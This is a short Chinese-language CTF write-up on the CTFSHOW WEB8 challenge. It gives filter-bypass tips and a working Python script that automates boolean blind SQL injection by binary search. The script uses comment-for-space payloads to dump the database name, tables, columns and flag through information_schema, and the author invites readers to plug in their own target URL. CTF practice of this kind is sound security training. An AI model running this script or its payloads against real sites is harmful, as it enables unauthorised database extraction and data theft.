[SQL盲注]CTFSHOW------WEB8(二分法快速爆出数据)

补充一些绕过方法：
1.将limit 0,1样式改为limit 1 offset 0。
2.将substr(string,1,1)改为substr(string from 1 for 1)。

这道题是盲注，至于是为什么可以看其他师傅的，我不想多说，只是想记录下我的脚本而已
我的payload分别是查数据库、数据表、列名和爆字段，自己取消注释玩，
然后url前半部分改成你的靶机的url

import requests

url = "http://a448d26a-b594-47a1-b3e0-fddbe1d869ba.chall.ctf.show/?id=-1/**/or/**/"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'ascii(substr(database()/**/from/**/{i}/**/for/**/1))>{mid}#'
        # payload = f'ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database()))/**/from/**/{i}/**/for/**/1))>{mid}'
        # payload = f'ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name="flag"))/**/from/**/{i}/**/for/**/1))>{mid}'
        payload = f'ascii(substr((select/**/(flag)from(flag))/**/from/**/{i}/**/for/**/1))>{mid}'
        r = requests.get(url + payload)
        if "By Rudyard Kipling" in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)